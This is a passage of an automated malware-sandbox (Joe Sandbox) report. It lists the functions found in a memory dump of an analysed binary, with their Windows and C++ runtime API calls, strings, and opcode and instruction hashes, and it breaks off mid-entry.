GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00DF86BA
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 00DF870A
VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 00DF871F

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 1b0f6803ab96c72d12c5e244e2305857ba3957559d523fa4878ec1abfbee05bd
Instruction ID: 25535a7499f7cdf87b2f07a650ba122b70a91b05394f9c740f18f1ed009bffe4
Opcode Fuzzy Hash: 1b0f6803ab96c72d12c5e244e2305857ba3957559d523fa4878ec1abfbee05bd
Instruction Fuzzy Hash: 54219572E0011CABDB20EBA9CC85EEFB7B8EF44750F154425EA05F7141EA709904DBA1

Function 00E0FEB0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E0FEBC
IsDebuggerPresent.KERNEL32 ref: 00E0FF88
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E0FFA8
UnhandledExceptionFilter.KERNEL32(?), ref: 00E0FFB2

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0629fe5c9eacc7027edf4d3ea819c6a5d30d252d7495facd3188e71800ad1053
Instruction ID: b1a38432cec0662c0bb0079e4930156719ccc33560bc4c730f74e211074ecfc5
Opcode Fuzzy Hash: 0629fe5c9eacc7027edf4d3ea819c6a5d30d252d7495facd3188e71800ad1053
Instruction Fuzzy Hash: 7F311875D05218DBEB20DFA4D989BCDBBF8BF08304F1044EAE50DAB290EB715A858F45

Function 00E147AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002,?,AA85FA48,?,00DC6B23,?,AA85FA48), ref: 00E147C0
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,AA85FA48,00000000,00000000,?,00DC6B23,?,AA85FA48), ref: 00E147E2

Strings

!x-sys-default-locale, xrefs: 00E147BB

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: d0b0ce8e11e9946bf530a3d39593f2a6de6c07cee3e15661435163c7a06f236d
Instruction ID: 17e1e2a01b648bd316c1a2c1553f45f83ef6277e40fc8976ca893e99ada90826
Opcode Fuzzy Hash: d0b0ce8e11e9946bf530a3d39593f2a6de6c07cee3e15661435163c7a06f236d
Instruction Fuzzy Hash: D8E06DB6151218FFFB189FA1CC0BDFF7BACEB05751F004115B942E2180E2B06E508760

Function 00E09413 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00DFD231: GetLastError.KERNEL32(?,?,00DF52A7,00E33790,0000000C), ref: 00DFD235
Part of subcall function 00DFD231: SetLastError.KERNEL32(00000000), ref: 00DFD2D7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E09467
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E094B1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E09577

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 152116816f00d1a685a03025146674c4e0dfed926981b4a169a69311e6ea5367
Instruction ID: 952f03ed29a2ee940ba2f90e341c1ba054c41985b53e579ce26fec29931db185
Opcode Fuzzy Hash: 152116816f00d1a685a03025146674c4e0dfed926981b4a169a69311e6ea5367
Instruction Fuzzy Hash: 0161BE719102079FDB299F29DC82BBA73A8EF05308F109179E905EA1C7EB35D9C1CB60

Function 00DF491D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00DF4A15
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00DF4A1F
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00DF4A2C

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1aa27e43c562700bc9df8bcc1f6affa89ecfd2ff6352faf97becb0f76637510a
Instruction ID: c67609f2230876772e36ba2c6d535eb0e39b52a62c72970eb55e2db63bf17650
Opcode Fuzzy Hash: 1aa27e43c562700bc9df8bcc1f6affa89ecfd2ff6352faf97becb0f76637510a
Instruction Fuzzy Hash: D231D37490121CABCB21DF64D889BDDBBF8BF08310F5095EAE51CA72A1E7709B858F54

Function 00E1070C Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E10722

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: df24973aa68e9dea65ec07d93ef0bd038e329204753913267c715c170afb8fa5
Instruction ID: dd26766f3b3eb9b80f6c0eb06e86c1aaa2e99bb4db5db99d3759e62383e88ae4
Opcode Fuzzy Hash: df24973aa68e9dea65ec07d93ef0bd038e329204753913267c715c170afb8fa5
Instruction Fuzzy Hash: E4517BB1D15209DFEB18CF66D9857AABBF0FB44314F24912AD445FB2A0D3B49984CF90

Function 00E16B69 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3095a1bf0494c18e6396a780510b756242c4990aa09904050baea6e646f3b1f
Instruction ID: 29f63cb317ea3c9b5daa9c0954b3a3236acaeaa258d70fb9bcdc8b2240bd80bc
Opcode Fuzzy Hash: e3095a1bf0494c18e6396a780510b756242c4990aa09904050baea6e646f3b1f
Instruction Fuzzy Hash: 5131A472900219AFDB20EFA9CC85DEBB7BDEB84314F144559F915E7245EA30AE808B60

Function 00E09666 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00DFD231: GetLastError.KERNEL32(?,?,00DF52A7,00E33790,0000000C), ref: 00DFD235
Part of subcall function 00DFD231: SetLastError.KERNEL32(00000000), ref: 00DFD2D7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00E096BA

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: d515e230b4035c7ff40e2f50050b9835bbb343de93545dcd3dbda9e3d67f285d
Instruction ID: e0d6a42b2ddb3301a0b5bbc28e11701c441c2008a2664732d82f30ff6fbb8289
Opcode Fuzzy Hash: d515e230b4035c7ff40e2f50050b9835bbb343de93545dcd3dbda9e3d67f285d
Instruction Fuzzy Hash: 4E219573520206ABDB289F25DC41ABA73A8EF55314F14617AFD01E61C3EB75DD80C760

Function 00E092ED Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DFD231: GetLastError.KERNEL32(?,?,00DF52A7,00E33790,0000000C), ref: 00DFD235
Part of subcall function 00DFD231: SetLastError.KERNEL32(00000000), ref: 00DFD2D7

EnumSystemLocalesW.KERNEL32(00E09413,00000001,00000000,?,-00000050,?,00E09A44,00000000,?,?,?,00000055,?), ref: 00E0935F

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 90b350f5098fa9570160d798845b74e2a5d57ca3b2bbe2b7fc09bf3b84da6db3
Instruction ID: db7cc10fc94fad4417ddd6671f9f4357402a182ff8c4c88e2a50b00e1a6744ba
Opcode Fuzzy Hash: 90b350f5098fa9570160d798845b74e2a5d57ca3b2bbe2b7fc09bf3b84da6db3
Instruction Fuzzy Hash: 001125376003059FDB189F39C8916BAB792FF84318B18442DEA8797AC2D375B883CB40

Function 00E09895 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00DFD231: GetLastError.KERNEL32(?,?,00DF52A7,00E33790,0000000C), ref: 00DFD235
Part of subcall function 00DFD231: SetLastError.KERNEL32(00000000), ref: 00DFD2D7

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00E0962F,00000000,00000000,?), ref: 00E098C1

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: ab1f152d1e94f9c0c302703d835d7db9969edb0b138fb42b9b8d916fe8f223ab
Instruction ID: 289894434159fd4ce80b947e6baaab7e36ca998aab99055bc8729fe3b90e1a44
Opcode Fuzzy Hash: ab1f152d1e94f9c0c302703d835d7db9969edb0b138fb42b9b8d916fe8f223ab
Instruction Fuzzy Hash: 91F0F9326002156FDB2C5E24C855AFA7B54EB41758F159424ED52B32C3DA34FD81C6B0

Function 00E09388 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DFD231: GetLastError.KERNEL32(?,?,00DF52A7,00E33790,0000000C), ref: 00DFD235
Part of subcall function 00DFD231: SetLastError.KERNEL32(00000000), ref: 00DFD2D7

EnumSystemLocalesW.KERNEL32(00E09666,00000001,?,?,-00000050,?,00E09A08,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00E093D2

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: fe02cd03e0991c4c83ec0ca8424288adb61a2ec52debbb0dae848dd961795961
Instruction ID: 1cdd8fd146a52a3a3f842c5a48561ac29435cd7c90780b3591aa9154204a7076
Opcode Fuzzy Hash: fe02cd03e0991c4c83ec0ca8424288adb61a2ec52debbb0dae848dd961795961
Instruction Fuzzy Hash: 57F0F6362003045FDB245F35DC81A7A7B95FF80768F15842DFA465B6C2D6B59C82CB50

Function 00DFEC4F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DFFA81: EnterCriticalSection.KERNEL32(?,?,00DFCF09,?,00E33890,00000008,00DFD0CD,?,?,?), ref: 00DFFA90

EnumSystemLocalesW.KERNEL32(00DFEC42,00000001,00E33970,0000000C,00DFF0D0,00000000), ref: 00DFEC87

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: dac8c1787342079cc8860d28e6772a5bfbaa5fdabfc70410ff3b2e75bf3d6365
Instruction ID: 377c77979ce9e89492114dab166c5a11e0cb5670c1be4fb2c3bae3d642e3ff45
Opcode Fuzzy Hash: dac8c1787342079cc8860d28e6772a5bfbaa5fdabfc70410ff3b2e75bf3d6365
Instruction Fuzzy Hash: 49F0AF72A04218EFD704DFA9E846B9C7BF0EB48720F11852AF504A73E0C7B54945CF60

Function 00E092A2 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DFD231: GetLastError.KERNEL32(?,?,00DF52A7,00E33790,0000000C), ref: 00DFD235
Part of subcall function 00DFD231: SetLastError.KERNEL32(00000000), ref: 00DFD2D7

EnumSystemLocalesW.KERNEL32(00E091FB,00000001,?,?,?,00E09A66,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00E092D9

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c77513f79fa27c83327ece16454620e817ea2bdff3be5d0f96bd0e9bce660002
Instruction ID: 65f7ce158f1cbfb69e103ebaaca4d40fe3b27f9c48f1d954f54b054789deca2c
Opcode Fuzzy Hash: c77513f79fa27c83327ece16454620e817ea2bdff3be5d0f96bd0e9bce660002
Instruction Fuzzy Hash: 86F0EC3630020557CB149F75DC9566A7F95EFC1714B074059EE099B192C6719883C750

Function 00DFF22B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00DFE83C,?,20001004,00000000,00000002,?,?,00DFDE3E), ref: 00DFF25F

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2366fc7c7545d8aafdadcc524ef007a26dbfab0a02538a4d7ea456263b7e471d
Instruction ID: 6d8fc3fa5bca066513a94e7c654755c30c38f6161bcdbc8be17aa3b01926b578
Opcode Fuzzy Hash: 2366fc7c7545d8aafdadcc524ef007a26dbfab0a02538a4d7ea456263b7e471d
Instruction Fuzzy Hash: 0FE04F3650112CBFCF122F61DC09EBE7F19FF44750F098021FE4565162CB318922AAB4

Function 00E01034 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca6b2a1cebfc3049b33a2f150552e7545a3f05e9a4079beeee08f5553ceba90
Instruction ID: 412961f3e32ce0db0f956affe8dfeac05c1028e906c19da55e1193904cc76505
Opcode Fuzzy Hash: 7ca6b2a1cebfc3049b33a2f150552e7545a3f05e9a4079beeee08f5553ceba90
Instruction Fuzzy Hash: E7E08C32911268EBCB14DBC8C904A9AF3FCEB49B80B114097F501E3150C670DE80C7E0

Function 00E00ECD Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1bf62397490f689b374f0ae576e6ac59e65954b3d9c6fe8f943cbf1ed6f09ae
Instruction ID: 55143eb0bfe5add232f2c6ade6a4c9c19a987d7b22404868c9dd1a9e6166e0b4
Opcode Fuzzy Hash: d1bf62397490f689b374f0ae576e6ac59e65954b3d9c6fe8f943cbf1ed6f09ae
Instruction Fuzzy Hash: 62C04C3414298446CE29DA14C2717A9339DA7917C6FA428CCC5466F6C6C51F9CC7D615

Function 00DEB620 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 365COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00DEB6A9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00DEB6F5
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00DEB7CD
std::_Lockit::~_Lockit.LIBCPMT ref: 00DEB862
Concurrency::cancel_current_task.LIBCPMT ref: 00DEB887
Concurrency::cancel_current_task.LIBCPMT ref: 00DEB88C
Concurrency::cancel_current_task.LIBCPMT ref: 00DEB891
Concurrency::cancel_current_task.LIBCPMT ref: 00DEBA70

Strings

true, xrefs: 00DEB7A5
false, xrefs: 00DEB77B
bad locale name, xrefs: 00DEB87D

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::_$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name$false$true
API String ID: 4095849291-1062449267
Opcode ID: 5f16c65e590a7532867f1ee6417b1da7f8d92fb88d253bf4cec43064ed151495
Instruction ID: 72d6c925a1a4d630b5705959402147d0bbedd7fa16b4e1733d809d9cb3b44c80
Opcode Fuzzy Hash: 5f16c65e590a7532867f1ee6417b1da7f8d92fb88d253bf4cec43064ed151495
Instruction Fuzzy Hash: 84D1CFB0A00349DBDB14EFA9D8817AEB7F4EF44310F14466AE915A7341E771EA44CBB1

Function 00DDD070 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 321COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00DDD0A6
std::_Lockit::_Lockit.LIBCPMT ref: 00DDD0C8
std::_Lockit::~_Lockit.LIBCPMT ref: 00DDD0E8
std::_Lockit::~_Lockit.LIBCPMT ref: 00DDD10F
std::_Lockit::_Lockit.LIBCPMT ref: 00DDD188
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00DDD1D4
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00DDD1EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00DDD283
std::_Facet_Register.LIBCPMT ref: 00DDD290

Strings

bad locale name, xrefs: 00DDD2AA

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: ab6297f62a933b94d9274d3a0fc79b7d4ca3b56f49363ba51723cc224ef672b6
Instruction ID: c9533bac17eda49a9345958272c75d336e3ddcc2cbdedaaf5c100bd73dfa75e5
Opcode Fuzzy Hash: ab6297f62a933b94d9274d3a0fc79b7d4ca3b56f49363ba51723cc224ef672b6
Instruction Fuzzy Hash: 6EC17FB1E002599FCF10CFA9D945BEEBBF5AF48310F28816AE805A7351E7359D05CBA1

Function 00DEA930 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00DEA966
std::_Lockit::_Lockit.LIBCPMT ref: 00DEA988
std::_Lockit::~_Lockit.LIBCPMT ref: 00DEA9A8
std::_Lockit::~_Lockit.LIBCPMT ref: 00DEA9CF
std::_Lockit::_Lockit.LIBCPMT ref: 00DEAA48
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00DEAA94
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00DEAAAE
std::_Lockit::~_Lockit.LIBCPMT ref: 00DEAB43
std::_Facet_Register.LIBCPMT ref: 00DEAB50

Strings

bad locale name, xrefs: 00DEAB6A

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 525d76add16e0edf7bfd340d266b85f4cd55da89ccd0f17837c310c2fe9bd161
Instruction ID: 148579d0caec7e78e80090199d00101bd101365000797845658c9b15368a4c2a
